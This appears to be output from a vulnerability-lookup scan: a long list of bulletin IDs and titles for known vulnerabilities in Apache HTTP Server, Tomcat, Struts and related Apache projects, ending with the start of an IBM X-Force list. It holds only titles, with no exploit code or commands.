| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
| [54798] Apache Libcloud Man In The Middle Vulnerability
| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
| [54189] Apache Roller Cross Site Request Forgery Vulnerability
| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
| [53880] Apache CXF Child Policies Security Bypass Vulnerability
| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
| [49290] Apache Wicket Cross Site Scripting Vulnerability
| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
9925| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
9926| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
9927| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
9928| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
9929| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
9930| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
9931| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
9932| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
9933| [46953] Apache MPM-ITK Module Security Weakness
9934| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
9935| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
9936| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
9937| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
9938| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
9939| [46166] Apache Tomcat JVM Denial of Service Vulnerability
9940| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
9941| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
9942| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
9943| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
9944| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
9945| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
9946| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
9947| [44616] Apache Shiro Directory Traversal Vulnerability
9948| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
9949| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
9950| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
9951| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
9952| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
9953| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
9954| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
9955| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
9956| [42492] Apache CXF XML DTD Processing Security Vulnerability
9957| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
9958| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
9959| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
9960| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
9961| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
9962| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
9963| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
9964| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
9965| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
9966| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
9967| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
9968| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
9969| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
9970| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
9971| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
9972| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
9973| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
9974| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
9975| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
9976| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
| [20527] Apache Mod_TCL Remote Format String Vulnerability
| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
| [19106] Apache Tomcat Information Disclosure Vulnerability
| [18138] Apache James SMTP Denial Of Service Vulnerability
| [17342] Apache Struts Multiple Remote Vulnerabilities
| [17095] Apache Log4Net Denial Of Service Vulnerability
| [16916] Apache mod_python FileSession Code Execution Vulnerability
| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
| [15177] PHP Apache 2 Local Denial of Service Vulnerability
| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
| [14106] Apache HTTP Request Smuggling Vulnerability
| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
| [11471] Apache mod_include Local Buffer Overflow Vulnerability
| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
| [11094] Apache mod_ssl Denial Of Service Vulnerability
| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
| [10478] ClueCentral Apache Suexec Patch Security Weakness
| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
| [9921] Apache Connection Blocking Denial Of Service Vulnerability
| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
| [9733] Apache Cygwin Directory Traversal Vulnerability
| [9599] Apache mod_php Global Variables Information Disclosure Weakness
| [9590] Apache-SSL Client Certificate Forging Vulnerability
| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
| [8898] Red Hat Apache Directory Index Default Configuration Error
| [8883] Apache Cocoon Directory Traversal Vulnerability
| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
| [8707] Apache htpasswd Password Entropy Weakness
| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
| [8226] Apache HTTP Server Multiple Vulnerabilities
| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
| [7255] Apache Web Server File Descriptor Leakage Vulnerability
| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
| [6939] Apache Web Server ETag Header Information Disclosure Weakness
| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
| [6117] Apache mod_php File Descriptor Leakage Vulnerability
| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
| [5992] Apache HTDigest Insecure Temporary File Vulnerability
| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
| [5485] Apache 2.0 Path Disclosure Vulnerability
| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
| [4437] Apache Error Message Cross-Site Scripting Vulnerability
| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
| [3596] Apache Split-Logfile File Append Vulnerability
| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
| [3169] Apache Server Address Disclosure Vulnerability
| [3009] Apache Possible Directory Index Disclosure Vulnerability
| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
| [2216] Apache Web Server DoS Vulnerability
| [2182] Apache /tmp File Race Vulnerability
| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
| [1821] Apache mod_cookies Buffer Overflow Vulnerability
| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
| [1457] Apache::ASP source.asp Example Script Vulnerability
| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [86258] Apache CloudStack text fields cross-site scripting
| [85983] Apache Subversion mod_dav_svn module denial of service
| [85875] Apache OFBiz UEL code execution
| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
